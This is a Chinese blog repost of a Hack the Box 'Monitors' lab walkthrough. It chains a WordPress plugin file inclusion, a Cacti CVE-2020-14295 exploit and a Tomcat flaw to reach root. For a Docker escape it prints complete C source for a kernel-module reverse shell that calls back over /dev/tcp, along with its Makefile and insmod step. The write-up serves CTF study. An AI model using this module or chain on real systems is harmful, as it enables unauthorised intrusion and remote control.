IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 系统运维 -> Hack the Box Monitors 靶机渗透 -> 正文阅读

[系统运维]Hack the Box Monitors 靶机渗透

Monitors靶机渗透

目标:得到root权限,取得user.txt,root.txt
作者:shadow
时间:2021-07-27

请注意:我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。

一、信息收集

去80端口看看

添加dns

echo "10.10.10.238 monitors.htb" >> /etc/hosts

二、web渗透

尝试wpscan,没token的可以去官网注册一个,免费的

发现存在未授权文件包含漏洞,查看exploit

?漏洞是可用的

查看wp-config.php 获得mysql用户名密码

?wfuzz 获得http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../../etc/apache2/sites-available/000-default.conf

将cacti-admin.monitors.htb写入hosts

?输入用户名密码成功登录

查到1.2.12存在漏洞CVE-2020-14295

https://www.exploit-db.com/exploits/49810

成功获得webshell

三、提权

查看目录发现home下有一个.backup无权限进入,但是发现backup.sh

得到用户名与密码,尝试ssh

?

成功登录,得到user.txt

sudo -l 发现sudo禁用

猜测8443端口应该是note.txt里面提到的docker

ssh -L 8443:127.0.0.1:8443 -R 4444:127.0.0.1:4444 -R 8080:127.0.0.1:8080 marcus@monitors.htb

成功登录docker

本地访问代理服务器发现tomcat版本9.0.31存在漏洞

成功获得docker的root权限

https://blog.pentesteracademy.com/abusing-sys-module-capability-to-perform-docker-container-breakout-cf5c29956edd

编写一个程序,在usermode Helper API的帮助下调用反向shell

c代码

#include <linux/kmod.h>
#include <linux/module.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");
char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/172.18.0.1/4445?0>&1", NULL};
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };
static int __init reverse_shell_init(void) {
return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}
static void __exit reverse_shell_exit(void) {
printk(KERN_INFO "Exiting\n");
}
module_init(reverse_shell_init);
module_exit(reverse_shell_exit);

创建一个Makefile来编译内核模块

obj-m +=reverse-shell.o
all:
?? ?make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
?? ?make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean

本地保存之后然后上传到docker

在ssh登录的窗口监听reverse-shell中的反弹端口,在docker中运行

insmod reverse-shell.ko

成功反弹shell,root权限

?四、总结

?又是一个docker的靶机,前期web渗透时候模糊查询文件000-default.conf花了些时间,后期查找docker逃逸花了很久,难度还是挺大的

  系统运维 最新文章
配置小型公司网络WLAN基本业务(AC通过三层
如何在交付运维过程中建立风险底线意识,提
快速传输大文件,怎么通过网络传大文件给对
从游戏服务端角度分析移动同步(状态同步)
MySQL使用MyCat实现分库分表
如何用DWDM射频光纤技术实现200公里外的站点
国内顺畅下载k8s.gcr.io的镜像
自动化测试appium
ctfshow ssrf
Linux操作系统学习之实用指令(Centos7/8均
上一篇文章      下一篇文章      查看所有文章
加:2021-07-28 08:14:35  更:2021-07-28 08:15:08 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 -2024/12/27 10:49:06-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码
数据统计